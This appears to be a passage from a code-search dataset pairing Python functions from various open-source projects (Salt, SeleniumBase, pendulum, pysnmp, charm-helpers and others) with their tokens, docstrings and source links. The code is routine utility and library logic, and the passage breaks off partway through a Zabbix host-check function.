def getDiskSpace(self, file_path, upload_path = '', overwrite = False): """getDiskSpace Args: file_path: Full path for a file you want to checkUpload upload_path: Ndrive path where you want to upload file ex) /Picture/ Returns: True: Possible to upload a file with a given file_size False: Impossible to upload a file with a given file_size """ self.checkAccount() url = nurls['checkUpload'] file_size = os.stat(file_path).st_size file_name = os.path.basename(file_path) now = datetime.datetime.now().isoformat() data = {'userid': self.user_id, 'useridx': self.useridx, 'getlastmodified': now, 'dstresource': upload_path + file_name, 'overwrite': overwrite, 'uploadsize': file_size, } r = self.session.post(nurls['getDiskSpace'], data = data) return resultManager(r.text)
[ "def", "getDiskSpace", "(", "self", ",", "file_path", ",", "upload_path", "=", "''", ",", "overwrite", "=", "False", ")", ":", "self", ".", "checkAccount", "(", ")", "url", "=", "nurls", "[", "'checkUpload'", "]", "file_size", "=", "os", ".", "stat", "...
getDiskSpace Args: file_path: Full path for a file you want to checkUpload upload_path: Ndrive path where you want to upload file ex) /Picture/ Returns: True: Possible to upload a file with a given file_size False: Impossible to upload a file with a given file_size
[ "getDiskSpace" ]
python
train
rwl/pylon
pyreto/auction.py
https://github.com/rwl/pylon/blob/916514255db1ae1661406f0283df756baf960d14/pyreto/auction.py#L106-L117
def _clearQuantities(self): """ Computes the cleared quantities for each offer/bid according to the dispatched output from the OPF solution. """ generators = [g for g in self.case.generators if not g.is_load] vLoads = [g for g in self.case.generators if g.is_load] for g in generators: self._clearQuantity(self.offers, g) for vl in vLoads: self._clearQuantity(self.bids, vl)
[ "def", "_clearQuantities", "(", "self", ")", ":", "generators", "=", "[", "g", "for", "g", "in", "self", ".", "case", ".", "generators", "if", "not", "g", ".", "is_load", "]", "vLoads", "=", "[", "g", "for", "g", "in", "self", ".", "case", ".", "...
Computes the cleared quantities for each offer/bid according to the dispatched output from the OPF solution.
[ "Computes", "the", "cleared", "quantities", "for", "each", "offer", "/", "bid", "according", "to", "the", "dispatched", "output", "from", "the", "OPF", "solution", "." ]
python
train
saltstack/salt
salt/utils/minions.py
https://github.com/saltstack/salt/blob/e8541fd6e744ab0df786c0f76102e41631f45d46/salt/utils/minions.py#L1026-L1030
def runner_check(self, auth_list, fun, args): ''' Check special API permissions ''' return self.spec_check(auth_list, fun, args, 'runner')
[ "def", "runner_check", "(", "self", ",", "auth_list", ",", "fun", ",", "args", ")", ":", "return", "self", ".", "spec_check", "(", "auth_list", ",", "fun", ",", "args", ",", "'runner'", ")" ]
Check special API permissions
[ "Check", "special", "API", "permissions" ]
python
train
seleniumbase/SeleniumBase
seleniumbase/fixtures/base_case.py
https://github.com/seleniumbase/SeleniumBase/blob/62e5b43ee1f90a9ed923841bdd53b1b38358f43a/seleniumbase/fixtures/base_case.py#L1683-L1693
def create_folder(self, folder): """ Creates a folder of the given name if it doesn't already exist. """ if folder.endswith("/"): folder = folder[:-1] if len(folder) < 1: raise Exception("Minimum folder name length = 1.") if not os.path.exists(folder): try: os.makedirs(folder) except Exception: pass
[ "def", "create_folder", "(", "self", ",", "folder", ")", ":", "if", "folder", ".", "endswith", "(", "\"/\"", ")", ":", "folder", "=", "folder", "[", ":", "-", "1", "]", "if", "len", "(", "folder", ")", "<", "1", ":", "raise", "Exception", "(", "\...
Creates a folder of the given name if it doesn't already exist.
[ "Creates", "a", "folder", "of", "the", "given", "name", "if", "it", "doesn", "t", "already", "exist", "." ]
python
train
zengbin93/zb
zb/crawlers/xinshipu.py
https://github.com/zengbin93/zb/blob/ccdb384a0b5801b459933220efcb71972c2b89a7/zb/crawlers/xinshipu.py#L20-L83
def get_recipe_detail(recipe_url): """从url中获取菜谱详细信息 :param recipe_url: str 菜谱url,如:https://www.xinshipu.com/zuofa/598775; https://www.xinshipu.com//zuofa/749342 :return:dict """ response = requests.get(recipe_url, headers=get_header()) html = BeautifulSoup(response.text, 'lxml') # 获取菜名 name = html.find("div", {"class": "re-up"}).h1.text # 主图 img = html.find("div", {"class": "gallery"}).a['href'] img = urljoin(HOME_URL, img) all_info = html.find_all("div", {"class": "dd"}) if len(all_info) == 4: # 简介 intro = re.sub('\n|\t|\r| ', '', all_info[0].text) material_i = 1 method_i = 2 else: intro = None material_i = 0 method_i = 1 # 食材 material = all_info[material_i].text.strip() material = re.sub('\r\n|\r\n \n|\n\n\n', '\n', material) # 做法 try: method_steps = html.find("ol", {"class": "re-step-wpic"}).find_all('li') method = [] for i, m in enumerate(method_steps, 1): step = dict(step_num=i) step['text'] = m.text.strip() if m.img: step['img_url'] = urljoin(HOME_URL, m.img['src']) method.append(step) except: method = all_info[method_i].text.strip() method = re.sub('\r\n|\r\n \n|\n\n\n\n', '\n', method) # 相关菜品 classify = all_info[-1].text.strip() if '\xa0\xa0' in classify: classify = classify.replace('\xa0\xa0', ' | ') else: classify = "" return { "name": name, "url": recipe_url, "img": img, "intro": intro, "material": material, "method": method, "classify": classify }
[ "def", "get_recipe_detail", "(", "recipe_url", ")", ":", "response", "=", "requests", ".", "get", "(", "recipe_url", ",", "headers", "=", "get_header", "(", ")", ")", "html", "=", "BeautifulSoup", "(", "response", ".", "text", ",", "'lxml'", ")", "# 获取菜名",...
从url中获取菜谱详细信息 :param recipe_url: str 菜谱url,如:https://www.xinshipu.com/zuofa/598775; https://www.xinshipu.com//zuofa/749342 :return:dict
[ "从url中获取菜谱详细信息" ]
python
train
Sanji-IO/sanji
sanji/model/__init__.py
https://github.com/Sanji-IO/sanji/blob/5c54cc2772bdfeae3337f785de1957237b828b34/sanji/model/__init__.py#L153-L174
def set(self, id, newObj): """Set a object Args: id (int): Target Object ID newObj (object): New object will be set Returns: Object: New object None: If specified object id is not found MultipleInvalid: If input object is invaild """ newObj = self.validation(newObj) for index in xrange(0, len(self.model.db)): if self.model.db[index]["id"] != id: continue newObj["id"] = id self.model.db[index] = self._cast_model(newObj) if not self._batch.enable.is_set(): self.model.save_db() return self.model.db[index] return None
[ "def", "set", "(", "self", ",", "id", ",", "newObj", ")", ":", "newObj", "=", "self", ".", "validation", "(", "newObj", ")", "for", "index", "in", "xrange", "(", "0", ",", "len", "(", "self", ".", "model", ".", "db", ")", ")", ":", "if", "self"...
Set a object Args: id (int): Target Object ID newObj (object): New object will be set Returns: Object: New object None: If specified object id is not found MultipleInvalid: If input object is invaild
[ "Set", "a", "object", "Args", ":", "id", "(", "int", ")", ":", "Target", "Object", "ID", "newObj", "(", "object", ")", ":", "New", "object", "will", "be", "set", "Returns", ":", "Object", ":", "New", "object", "None", ":", "If", "specified", "object"...
python
train
juju/charm-helpers
charmhelpers/core/host.py
https://github.com/juju/charm-helpers/blob/aa785c40c3b7a8c69dbfbc7921d6b9f30142e171/charmhelpers/core/host.py#L859-L868
def get_nic_mtu(nic): """Return the Maximum Transmission Unit (MTU) for a network interface.""" cmd = ['ip', 'addr', 'show', nic] ip_output = subprocess.check_output(cmd).decode('UTF-8').split('\n') mtu = "" for line in ip_output: words = line.split() if 'mtu' in words: mtu = words[words.index("mtu") + 1] return mtu
[ "def", "get_nic_mtu", "(", "nic", ")", ":", "cmd", "=", "[", "'ip'", ",", "'addr'", ",", "'show'", ",", "nic", "]", "ip_output", "=", "subprocess", ".", "check_output", "(", "cmd", ")", ".", "decode", "(", "'UTF-8'", ")", ".", "split", "(", "'\\n'", ...
Return the Maximum Transmission Unit (MTU) for a network interface.
[ "Return", "the", "Maximum", "Transmission", "Unit", "(", "MTU", ")", "for", "a", "network", "interface", "." ]
python
train
rcsb/mmtf-python
mmtf/utils/decoder_utils.py
https://github.com/rcsb/mmtf-python/blob/899bb877ca1b32a9396803d38c5bf38a2520754e/mmtf/utils/decoder_utils.py#L150-L159
def add_entity_info( data_api, struct_inflator): """Add the entity info to the structure. :param data_api the interface to the decoded data :param struct_inflator the interface to put the data into the client object """ for entity in data_api.entity_list: struct_inflator.set_entity_info(entity["chainIndexList"], entity["sequence"], entity["description"], entity["type"])
[ "def", "add_entity_info", "(", "data_api", ",", "struct_inflator", ")", ":", "for", "entity", "in", "data_api", ".", "entity_list", ":", "struct_inflator", ".", "set_entity_info", "(", "entity", "[", "\"chainIndexList\"", "]", ",", "entity", "[", "\"sequence\"", ...
Add the entity info to the structure. :param data_api the interface to the decoded data :param struct_inflator the interface to put the data into the client object
[ "Add", "the", "entity", "info", "to", "the", "structure", ".", ":", "param", "data_api", "the", "interface", "to", "the", "decoded", "data", ":", "param", "struct_inflator", "the", "interface", "to", "put", "the", "data", "into", "the", "client", "object" ]
python
train
manns/pyspread
pyspread/src/model/model.py
https://github.com/manns/pyspread/blob/0e2fd44c2e0f06605efc3058c20a43a8c1f9e7e0/pyspread/src/model/model.py#L1360-L1368
def reload_modules(self): """Reloads modules that are available in cells""" import src.lib.charts as charts from src.gui.grid_panels import vlcpanel_factory modules = [charts, bz2, base64, re, ast, sys, wx, numpy, datetime] for module in modules: reload(module)
[ "def", "reload_modules", "(", "self", ")", ":", "import", "src", ".", "lib", ".", "charts", "as", "charts", "from", "src", ".", "gui", ".", "grid_panels", "import", "vlcpanel_factory", "modules", "=", "[", "charts", ",", "bz2", ",", "base64", ",", "re", ...
Reloads modules that are available in cells
[ "Reloads", "modules", "that", "are", "available", "in", "cells" ]
python
train
BD2KGenomics/toil-scripts
src/toil_scripts/rnaseq_unc/rnaseq_unc_pipeline.py
https://github.com/BD2KGenomics/toil-scripts/blob/f878d863defcdccaabb7fe06f991451b7a198fb7/src/toil_scripts/rnaseq_unc/rnaseq_unc_pipeline.py#L578-L604
def bamsort_and_index(job, job_vars): """ Sorts bam file and produces index file job_vars: tuple Tuple of dictionaries: input_args and ids """ # Unpack variables input_args, ids = job_vars work_dir = job.fileStore.getLocalTempDir() sudo = input_args['sudo'] # I/O rg_alignments = return_input_paths(job, work_dir, ids, 'rg_alignments.bam') output = os.path.join(work_dir, 'sorted.bam') # Command -- second argument is "Output Prefix" cmd1 = ['sort', docker_path(rg_alignments), docker_path('sorted')] cmd2 = ['index', docker_path(output)] docker_call(tool='quay.io/ucsc_cgl/samtools:0.1.19--dd5ac549b95eb3e5d166a5e310417ef13651994e', tool_parameters=cmd1, work_dir=work_dir, sudo=sudo) docker_call(tool='quay.io/ucsc_cgl/samtools:0.1.19--dd5ac549b95eb3e5d166a5e310417ef13651994e', tool_parameters=cmd2, work_dir=work_dir, sudo=sudo) # Write to FileStore ids['sorted.bam'] = job.fileStore.writeGlobalFile(output) ids['sorted.bam.bai'] = job.fileStore.writeGlobalFile(os.path.join(work_dir, 'sorted.bam.bai')) # Run child job output_ids = job.addChildJobFn(sort_bam_by_reference, job_vars, disk='50 G').rv() rseq_id = job.addChildJobFn(rseq_qc, job_vars, disk='20 G').rv() return rseq_id, output_ids
[ "def", "bamsort_and_index", "(", "job", ",", "job_vars", ")", ":", "# Unpack variables", "input_args", ",", "ids", "=", "job_vars", "work_dir", "=", "job", ".", "fileStore", ".", "getLocalTempDir", "(", ")", "sudo", "=", "input_args", "[", "'sudo'", "]", "# ...
Sorts bam file and produces index file job_vars: tuple Tuple of dictionaries: input_args and ids
[ "Sorts", "bam", "file", "and", "produces", "index", "file" ]
python
train
juju/charm-helpers
charmhelpers/contrib/database/mysql.py
https://github.com/juju/charm-helpers/blob/aa785c40c3b7a8c69dbfbc7921d6b9f30142e171/charmhelpers/contrib/database/mysql.py#L299-L370
def set_mysql_password(self, username, password): """Update a mysql password for the provided username changing the leader settings To update root's password pass `None` in the username """ if username is None: username = 'root' # get root password via leader-get, it may be that in the past (when # changes to root-password were not supported) the user changed the # password, so leader-get is more reliable source than # config.previous('root-password'). rel_username = None if username == 'root' else username cur_passwd = self.get_mysql_password(rel_username) # password that needs to be set new_passwd = password # update password for all users (e.g. root@localhost, root@::1, etc) try: self.connect(user=username, password=cur_passwd) cursor = self.connection.cursor() except MySQLdb.OperationalError as ex: raise MySQLSetPasswordError(('Cannot connect using password in ' 'leader settings (%s)') % ex, ex) try: # NOTE(freyes): Due to skip-name-resolve root@$HOSTNAME account # fails when using SET PASSWORD so using UPDATE against the # mysql.user table is needed, but changes to this table are not # replicated across the cluster, so this update needs to run in # all the nodes. More info at # http://galeracluster.com/documentation-webpages/userchanges.html release = CompareHostReleases(lsb_release()['DISTRIB_CODENAME']) if release < 'bionic': SQL_UPDATE_PASSWD = ("UPDATE mysql.user SET password = " "PASSWORD( %s ) WHERE user = %s;") else: # PXC 5.7 (introduced in Bionic) uses authentication_string SQL_UPDATE_PASSWD = ("UPDATE mysql.user SET " "authentication_string = " "PASSWORD( %s ) WHERE user = %s;") cursor.execute(SQL_UPDATE_PASSWD, (new_passwd, username)) cursor.execute('FLUSH PRIVILEGES;') self.connection.commit() except MySQLdb.OperationalError as ex: raise MySQLSetPasswordError('Cannot update password: %s' % str(ex), ex) finally: cursor.close() # check the password was changed try: self.connect(user=username, password=new_passwd) self.execute('select 1;') except MySQLdb.OperationalError as ex: raise MySQLSetPasswordError(('Cannot connect using new password: ' '%s') % str(ex), ex) if not is_leader(): log('Only the leader can set a new password in the relation', level=DEBUG) return for key in self.passwd_keys(rel_username): _password = leader_get(key) if _password: log('Updating password for %s (%s)' % (key, rel_username), level=DEBUG) leader_set(settings={key: new_passwd})
[ "def", "set_mysql_password", "(", "self", ",", "username", ",", "password", ")", ":", "if", "username", "is", "None", ":", "username", "=", "'root'", "# get root password via leader-get, it may be that in the past (when", "# changes to root-password were not supported) the user...
Update a mysql password for the provided username changing the leader settings To update root's password pass `None` in the username
[ "Update", "a", "mysql", "password", "for", "the", "provided", "username", "changing", "the", "leader", "settings" ]
python
train
guaix-ucm/pyemir
emirdrp/util/sextractor.py
https://github.com/guaix-ucm/pyemir/blob/fef6bbabcb13f80123cafd1800a0f508a3c21702/emirdrp/util/sextractor.py#L419-L476
def setup(self, path=None): """ Look for SExtractor program ('sextractor', or 'sex'). If a full path is provided, only this path is checked. Raise a SExtractorException if it failed. Return program and version if it succeed. """ # -- Finding sextractor program and its version # first look for 'sextractor', then 'sex' candidates = ['sextractor', 'sex'] if (path): candidates = [path] selected = None for candidate in candidates: try: p = subprocess.Popen(candidate, shell=True, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, close_fds=True) (_out_err, _in) = (p.stdout, p.stdin) versionline = _out_err.read() if (versionline.find("SExtractor") != -1): selected = candidate break except IOError: continue if not(selected): raise SExtractorException( """ Cannot find SExtractor program. Check your PATH, or provide the SExtractor program path in the constructor. """ ) _program = selected # print versionline _version_match = re.search("[Vv]ersion ([0-9\.])+", versionline) if not _version_match: raise SExtractorException( "Cannot determine SExtractor version." ) _version = _version_match.group()[8:] if not _version: raise SExtractorException( "Cannot determine SExtractor version." ) # print "Use " + self.program + " [" + self.version + "]" return _program, _version
[ "def", "setup", "(", "self", ",", "path", "=", "None", ")", ":", "# -- Finding sextractor program and its version", "# first look for 'sextractor', then 'sex'", "candidates", "=", "[", "'sextractor'", ",", "'sex'", "]", "if", "(", "path", ")", ":", "candidates", "="...
Look for SExtractor program ('sextractor', or 'sex'). If a full path is provided, only this path is checked. Raise a SExtractorException if it failed. Return program and version if it succeed.
[ "Look", "for", "SExtractor", "program", "(", "sextractor", "or", "sex", ")", ".", "If", "a", "full", "path", "is", "provided", "only", "this", "path", "is", "checked", ".", "Raise", "a", "SExtractorException", "if", "it", "failed", ".", "Return", "program"...
python
train
theislab/scvelo
scvelo/preprocessing/utils.py
https://github.com/theislab/scvelo/blob/c7a96d70edfe705e86bf364434a9527d4fd8df11/scvelo/preprocessing/utils.py#L417-L423
def recipe_velocity(adata, min_counts=3, min_counts_u=3, n_top_genes=None, n_pcs=30, n_neighbors=30, log=True, copy=False): """Runs pp.filter_and_normalize() and pp.moments() """ from .moments import moments filter_and_normalize(adata, min_counts=min_counts, min_counts_u=min_counts_u, n_top_genes=n_top_genes, log=log) moments(adata, n_neighbors=n_neighbors, n_pcs=n_pcs) return adata if copy else None
[ "def", "recipe_velocity", "(", "adata", ",", "min_counts", "=", "3", ",", "min_counts_u", "=", "3", ",", "n_top_genes", "=", "None", ",", "n_pcs", "=", "30", ",", "n_neighbors", "=", "30", ",", "log", "=", "True", ",", "copy", "=", "False", ")", ":",...
Runs pp.filter_and_normalize() and pp.moments()
[ "Runs", "pp", ".", "filter_and_normalize", "()", "and", "pp", ".", "moments", "()" ]
python
train
zhanglab/psamm
psamm/balancecheck.py
https://github.com/zhanglab/psamm/blob/dc427848c4f9d109ca590f0afa024c63b685b3f4/psamm/balancecheck.py#L65-L88
def reaction_formula(reaction, compound_formula): """Calculate formula compositions for both sides of the specified reaction. If the compounds in the reaction all have formula, then calculate and return the chemical compositions for both sides, otherwise return `None`. Args: reaction: :class:`psamm.reaction.Reaction`. compound_formula: a map from compound id to formula. """ def multiply_formula(compound_list): for compound, count in compound_list: yield count * compound_formula[compound.name] for compound, _ in reaction.compounds: if compound.name not in compound_formula: return None else: left_form = reduce( operator.or_, multiply_formula(reaction.left), Formula()) right_form = reduce( operator.or_, multiply_formula(reaction.right), Formula()) return left_form, right_form
[ "def", "reaction_formula", "(", "reaction", ",", "compound_formula", ")", ":", "def", "multiply_formula", "(", "compound_list", ")", ":", "for", "compound", ",", "count", "in", "compound_list", ":", "yield", "count", "*", "compound_formula", "[", "compound", "."...
Calculate formula compositions for both sides of the specified reaction. If the compounds in the reaction all have formula, then calculate and return the chemical compositions for both sides, otherwise return `None`. Args: reaction: :class:`psamm.reaction.Reaction`. compound_formula: a map from compound id to formula.
[ "Calculate", "formula", "compositions", "for", "both", "sides", "of", "the", "specified", "reaction", "." ]
python
train
etingof/pysnmp
pysnmp/smi/mibs/SNMPv2-TC.py
https://github.com/etingof/pysnmp/blob/cde062dd42f67dfd2d7686286a322d40e9c3a4b7/pysnmp/smi/mibs/SNMPv2-TC.py#L120-L248
def prettyOut(self, value): # override asn1 type method """Implements DISPLAY-HINT evaluation""" if self.displayHint and (self.__integer.isSuperTypeOf(self, matchConstraints=False) and not self.getNamedValues() or self.__unsigned32.isSuperTypeOf(self, matchConstraints=False) or self.__timeticks.isSuperTypeOf(self, matchConstraints=False)): _ = lambda t, f=0: (t, f) displayHintType, decimalPrecision = _(*self.displayHint.split('-')) if displayHintType == 'x': return '0x%x' % value elif displayHintType == 'd': try: return '%.*f' % (int(decimalPrecision), float(value) / pow(10, int(decimalPrecision))) except Exception as exc: raise SmiError( 'float evaluation error: %s' % exc ) elif displayHintType == 'o': return '0%o' % value elif displayHintType == 'b': runningValue = value outputValue = ['B'] while runningValue: outputValue.insert(0, '%d' % (runningValue & 0x01)) runningValue >>= 1 return ''.join(outputValue) else: raise SmiError( 'Unsupported numeric type spec "%s" at %s' % (displayHintType, self.__class__.__name__) ) elif self.displayHint and self.__octetString.isSuperTypeOf(self, matchConstraints=False): outputValue = '' runningValue = OctetString(value).asOctets() displayHint = self.displayHint while runningValue and displayHint: # 1 if displayHint[0] == '*': repeatIndicator = repeatCount = octets.oct2int(runningValue[0]) displayHint = displayHint[1:] runningValue = runningValue[1:] else: repeatCount = 1 repeatIndicator = None # 2 octetLength = '' while displayHint and displayHint[0] in string.digits: octetLength += displayHint[0] displayHint = displayHint[1:] # length is manatory, but people ignore that if not octetLength: octetLength = len(runningValue) try: octetLength = int(octetLength) except Exception: raise SmiError( 'Bad octet length: %s' % octetLength ) if not displayHint: raise SmiError( 'Short octet length: %s' % self.displayHint ) # 3 displayFormat = displayHint[0] displayHint = displayHint[1:] # 4 if displayHint and displayHint[0] not in string.digits and displayHint[0] != '*': displaySep = displayHint[0] displayHint = displayHint[1:] else: displaySep = '' # 5 if displayHint and displaySep and repeatIndicator is not None: repeatTerminator = displayHint[0] displaySep = '' displayHint = displayHint[1:] else: repeatTerminator = None while repeatCount: repeatCount -= 1 if displayFormat == 'a': outputValue += runningValue[:octetLength].decode('ascii', 'ignore') elif displayFormat == 't': outputValue += runningValue[:octetLength].decode('utf-8', 'ignore') elif displayFormat in ('x', 'd', 'o'): number = 0 numberString = runningValue[:octetLength] while numberString: number <<= 8 try: number |= octets.oct2int(numberString[0]) numberString = numberString[1:] except Exception as exc: raise SmiError( 'Display format eval failure: %s: %s' % (numberString, exc) ) if displayFormat == 'x': outputValue += '%02x' % number elif displayFormat == 'o': outputValue += '%03o' % number else: outputValue += '%d' % number else: raise SmiError( 'Unsupported display format char: %s' % displayFormat ) if runningValue and repeatTerminator: outputValue += repeatTerminator runningValue = runningValue[octetLength:] if runningValue and displaySep: outputValue += displaySep if not displayHint: displayHint = self.displayHint return outputValue for base in inspect.getmro(self.__class__): if not issubclass(base, TextualConvention) and issubclass(base, Asn1Item): return base.prettyOut(self, value) raise SmiError('TEXTUAL-CONVENTION has no underlying SNMP base type')
[ "def", "prettyOut", "(", "self", ",", "value", ")", ":", "# override asn1 type method", "if", "self", ".", "displayHint", "and", "(", "self", ".", "__integer", ".", "isSuperTypeOf", "(", "self", ",", "matchConstraints", "=", "False", ")", "and", "not", "self...
Implements DISPLAY-HINT evaluation
[ "Implements", "DISPLAY", "-", "HINT", "evaluation" ]
python
train
Qiskit/qiskit-terra
qiskit/transpiler/layout.py
https://github.com/Qiskit/qiskit-terra/blob/d4f58d903bc96341b816f7c35df936d6421267d1/qiskit/transpiler/layout.py#L118-L121
def is_virtual(value): """Checks if value has the format of a virtual qubit """ return value is None or isinstance(value, tuple) and len(value) == 2 and isinstance( value[0], Register) and isinstance(value[1], int)
[ "def", "is_virtual", "(", "value", ")", ":", "return", "value", "is", "None", "or", "isinstance", "(", "value", ",", "tuple", ")", "and", "len", "(", "value", ")", "==", "2", "and", "isinstance", "(", "value", "[", "0", "]", ",", "Register", ")", "...
Checks if value has the format of a virtual qubit
[ "Checks", "if", "value", "has", "the", "format", "of", "a", "virtual", "qubit" ]
python
test
sdispater/pendulum
pendulum/date.py
https://github.com/sdispater/pendulum/blob/94d28b0d3cb524ae02361bd1ed7ea03e2e655e4e/pendulum/date.py#L59-L67
def day_of_year(self): """ Returns the day of the year (1-366). :rtype: int """ k = 1 if self.is_leap_year() else 2 return (275 * self.month) // 9 - k * ((self.month + 9) // 12) + self.day - 30
[ "def", "day_of_year", "(", "self", ")", ":", "k", "=", "1", "if", "self", ".", "is_leap_year", "(", ")", "else", "2", "return", "(", "275", "*", "self", ".", "month", ")", "//", "9", "-", "k", "*", "(", "(", "self", ".", "month", "+", "9", ")...
Returns the day of the year (1-366). :rtype: int
[ "Returns", "the", "day", "of", "the", "year", "(", "1", "-", "366", ")", "." ]
python
train
EnergieID/smappy
smappy/smappy.py
https://github.com/EnergieID/smappy/blob/1ada3abc9a51c76205c072369258f6f4f4e8fd0f/smappy/smappy.py#L314-L333
def actuator_on(self, service_location_id, actuator_id, duration=None): """ Turn actuator on Parameters ---------- service_location_id : int actuator_id : int duration : int, optional 300,900,1800 or 3600 , specifying the time in seconds the actuator should be turned on. Any other value results in turning on for an undetermined period of time. Returns ------- requests.Response """ return self._actuator_on_off( on_off='on', service_location_id=service_location_id, actuator_id=actuator_id, duration=duration)
[ "def", "actuator_on", "(", "self", ",", "service_location_id", ",", "actuator_id", ",", "duration", "=", "None", ")", ":", "return", "self", ".", "_actuator_on_off", "(", "on_off", "=", "'on'", ",", "service_location_id", "=", "service_location_id", ",", "actuat...
Turn actuator on Parameters ---------- service_location_id : int actuator_id : int duration : int, optional 300,900,1800 or 3600 , specifying the time in seconds the actuator should be turned on. Any other value results in turning on for an undetermined period of time. Returns ------- requests.Response
[ "Turn", "actuator", "on" ]
python
train
core/uricore
uricore/wkz_urls.py
https://github.com/core/uricore/blob/dc5ef4be7bd93da4c39e5c1cbd1ae4f3ad3f1f2a/uricore/wkz_urls.py#L383-L394
def url_quote(s, charset='utf-8', safe='/:'): """URL encode a single string with a given encoding. :param s: the string to quote. :param charset: the charset to be used. :param safe: an optional sequence of safe characters. """ if isinstance(s, unicode): s = s.encode(charset) elif not isinstance(s, str): s = str(s) return _quote(s, safe=safe)
[ "def", "url_quote", "(", "s", ",", "charset", "=", "'utf-8'", ",", "safe", "=", "'/:'", ")", ":", "if", "isinstance", "(", "s", ",", "unicode", ")", ":", "s", "=", "s", ".", "encode", "(", "charset", ")", "elif", "not", "isinstance", "(", "s", ",...
URL encode a single string with a given encoding. :param s: the string to quote. :param charset: the charset to be used. :param safe: an optional sequence of safe characters.
[ "URL", "encode", "a", "single", "string", "with", "a", "given", "encoding", "." ]
python
train
collectiveacuity/labPack
labpack/records/time.py
https://github.com/collectiveacuity/labPack/blob/52949ece35e72e3cc308f54d9ffa6bfbd96805b8/labpack/records/time.py#L181-L206
def fromEpoch(cls, epoch_time): ''' a method for constructing a labDT object from epoch timestamp :param epoch_time: number with epoch timestamp info :return: labDT object ''' # validate input title = 'Epoch time input for labDT.fromEpoch' if not isinstance(epoch_time, float) and not isinstance(epoch_time, int): raise TypeError('\n%s must be an integer or float.' % title) # construct labDT from epoch time dT = datetime.utcfromtimestamp(epoch_time).replace(tzinfo=pytz.utc) dt_kwargs = { 'year': dT.year, 'month': dT.month, 'day': dT.day, 'hour': dT.hour, 'minute': dT.minute, 'second': dT.second, 'microsecond': dT.microsecond, 'tzinfo': dT.tzinfo } return labDT(**dt_kwargs)
[ "def", "fromEpoch", "(", "cls", ",", "epoch_time", ")", ":", "# validate input\r", "title", "=", "'Epoch time input for labDT.fromEpoch'", "if", "not", "isinstance", "(", "epoch_time", ",", "float", ")", "and", "not", "isinstance", "(", "epoch_time", ",", "int", ...
a method for constructing a labDT object from epoch timestamp :param epoch_time: number with epoch timestamp info :return: labDT object
[ "a", "method", "for", "constructing", "a", "labDT", "object", "from", "epoch", "timestamp", ":", "param", "epoch_time", ":", "number", "with", "epoch", "timestamp", "info", ":", "return", ":", "labDT", "object" ]
python
train
shoebot/shoebot
shoebot/data/geometry.py
https://github.com/shoebot/shoebot/blob/d554c1765c1899fa25727c9fc6805d221585562b/shoebot/data/geometry.py#L157-L174
def point_in_polygon(points, x, y): """ Ray casting algorithm. Determines how many times a horizontal ray starting from the point intersects with the sides of the polygon. If it is an even number of times, the point is outside, if odd, inside. The algorithm does not always report correctly when the point is very close to the boundary. The polygon is passed as a list of (x,y)-tuples. """ odd = False n = len(points) for i in range(n): j = i < n - 1 and i + 1 or 0 x0, y0 = points[i][0], points[i][1] x1, y1 = points[j][0], points[j][1] if (y0 < y and y1 >= y) or (y1 < y and y0 >= y): if x0 + (y - y0) / (y1 - y0) * (x1 - x0) < x: odd = not odd return odd
[ "def", "point_in_polygon", "(", "points", ",", "x", ",", "y", ")", ":", "odd", "=", "False", "n", "=", "len", "(", "points", ")", "for", "i", "in", "range", "(", "n", ")", ":", "j", "=", "i", "<", "n", "-", "1", "and", "i", "+", "1", "or", ...
Ray casting algorithm. Determines how many times a horizontal ray starting from the point intersects with the sides of the polygon. If it is an even number of times, the point is outside, if odd, inside. The algorithm does not always report correctly when the point is very close to the boundary. The polygon is passed as a list of (x,y)-tuples.
[ "Ray", "casting", "algorithm", ".", "Determines", "how", "many", "times", "a", "horizontal", "ray", "starting", "from", "the", "point", "intersects", "with", "the", "sides", "of", "the", "polygon", ".", "If", "it", "is", "an", "even", "number", "of", "time...
python
valid
eng-tools/sfsimodels
sfsimodels/models/time.py
https://github.com/eng-tools/sfsimodels/blob/65a690ca440d61307f5a9b8478e4704f203a5925/sfsimodels/models/time.py#L64-L86
def time_indices(npts, dt, start, end, index): """ Determine the new start and end indices of the time series. :param npts: Number of points in original time series :param dt: Time step of original time series :param start: int or float, optional, New start point :param end: int or float, optional, New end point :param index: bool, optional, if False then start and end are considered values in time. :return: tuple, start index, end index """ if index is False: # Convert time values into indices if end != -1: e_index = int(end / dt) + 1 else: e_index = end s_index = int(start / dt) else: s_index = start e_index = end if e_index > npts: raise exceptions.ModelWarning("Cut point is greater than time series length") return s_index, e_index
[ "def", "time_indices", "(", "npts", ",", "dt", ",", "start", ",", "end", ",", "index", ")", ":", "if", "index", "is", "False", ":", "# Convert time values into indices", "if", "end", "!=", "-", "1", ":", "e_index", "=", "int", "(", "end", "/", "dt", ...
Determine the new start and end indices of the time series. :param npts: Number of points in original time series :param dt: Time step of original time series :param start: int or float, optional, New start point :param end: int or float, optional, New end point :param index: bool, optional, if False then start and end are considered values in time. :return: tuple, start index, end index
[ "Determine", "the", "new", "start", "and", "end", "indices", "of", "the", "time", "series", "." ]
python
train
saltstack/salt
salt/modules/zabbix.py
https://github.com/saltstack/salt/blob/e8541fd6e744ab0df786c0f76102e41631f45d46/salt/modules/zabbix.py#L1161-L1223
def host_exists(host=None, hostid=None, name=None, node=None, nodeids=None, **kwargs): ''' Checks if at least one host that matches the given filter criteria exists. .. versionadded:: 2016.3.0 :param host: technical name of the host :param hostids: Hosts (hostids) to delete. :param name: visible name of the host :param node: name of the node the hosts must belong to (zabbix API < 2.4) :param nodeids: IDs of the node the hosts must belong to (zabbix API < 2.4) :param _connection_user: Optional - zabbix user (can also be set in opts or pillar, see module's docstring) :param _connection_password: Optional - zabbix password (can also be set in opts or pillar, see module's docstring) :param _connection_url: Optional - url of zabbix frontend (can also be set in opts, pillar, see module's docstring) :return: IDs of the deleted hosts, False on failure. CLI Example: .. code-block:: bash salt '*' zabbix.host_exists 'Zabbix server' ''' conn_args = _login(**kwargs) zabbix_version = apiinfo_version(**kwargs) ret = {} try: if conn_args: # hostgroup.exists deprecated if _LooseVersion(zabbix_version) > _LooseVersion("2.5"): if not host: host = None if not name: name = None if not hostid: hostid = None ret = host_get(host, name, hostid, **kwargs) return bool(ret) # zabbix 2.4 nad earlier else: method = 'host.exists' params = {} if hostid: params['hostid'] = hostid if host: params['host'] = host if name: params['name'] = name # deprecated in 2.4 if _LooseVersion(zabbix_version) < _LooseVersion("2.4"): if node: params['node'] = node if nodeids: params['nodeids'] = nodeids if not hostid and not host and not name and not node and not nodeids: return {'result': False, 'comment': 'Please submit hostid, host, name, node 